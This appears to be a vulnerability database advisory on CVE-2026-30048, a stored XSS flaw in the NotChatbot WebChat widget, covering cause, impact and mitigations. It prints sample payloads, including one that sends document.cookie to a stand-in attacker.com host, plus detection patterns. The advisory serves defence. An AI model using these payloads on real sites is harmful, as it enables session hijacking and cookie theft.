
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-30048 is a stored Cross-Site Scripting (XSS) vulnerability in the NotChatbot WebChat widget (@developer.notchatbot/webchat) affecting versions up to and including 1.5.0 (initially reported as through 1.4.4). User-supplied chat input is not sanitized before being stored and rendered in the conversation history, allowing injection of arbitrary JavaScript that executes when the chat history is reloaded. The vulnerability was discovered in January 2026 by researcher Nano (@0xNano) and assigned a CVE in March 2026. It carries a CVSS v3.1 base score of 5.4 (Medium) (Feedly, GitHub PoC).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically in the chat history rendering logic of the WebChat component. When a user submits a chat message, the input is stored without output encoding or HTML sanitization and later rendered directly into the DOM, allowing injected HTML/JavaScript to execute in any browser that loads the conversation history. The attack requires low privileges (an authenticated chat user) and user interaction (a victim reloading or viewing the chat history), and the scope is changed since the injected script executes in the context of the hosting page. Because the flaw resides in the reusable widget component itself rather than any specific site configuration, all applications integrating the vulnerable package versions are affected (GitHub PoC, Researcher Gist).
Successful exploitation enables arbitrary JavaScript execution in the browser of any user who views the affected chat history, including support agents or administrators. This can lead to session hijacking, credential or cookie theft, information disclosure, and potential account takeover depending on the privileges of the victim viewing the conversation. Because the vulnerability is stored (persistent), a single injected payload can affect multiple victims over time without further attacker interaction (GitHub PoC, Feedly).
A public proof-of-concept (PoC) repository with concrete XSS payloads and step-by-step reproduction instructions is available on GitHub (GitHub PoC), and a video demonstration has also been published. The EPSS score is approximately 0.018% (very low automated exploitation probability), and there is no current evidence of in-the-wild exploitation or inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Feedly).
@developer.notchatbot/webchat package at version 1.5.0 or earlier (e.g., via npm package inspection or CDN URL app.unpkg.com/@developer.notchatbot/webchat@1.5.0).<img src=x onerror=alert(document.domain)> or a more targeted payload for session cookie theft (e.g., <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">).<img, <script, onerror=, or javascript: in message body fields; repeated loading of chat history endpoints by multiple users shortly after a specific message was submitted.No official patched version has been confirmed by the vendor in the available data; the PoC repository notes the vulnerability affects versions up to and including 1.5.0. Organizations should monitor the @developer.notchatbot/webchat npm package for a patched release and upgrade immediately when available. In the interim, implement a strict Content Security Policy (CSP) to block inline script execution, apply server-side input validation and output encoding (e.g., using DOMPurify) for all chat message content, and consider disabling or restricting the chat history feature until a fix is released (GitHub PoC, Researcher Gist).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."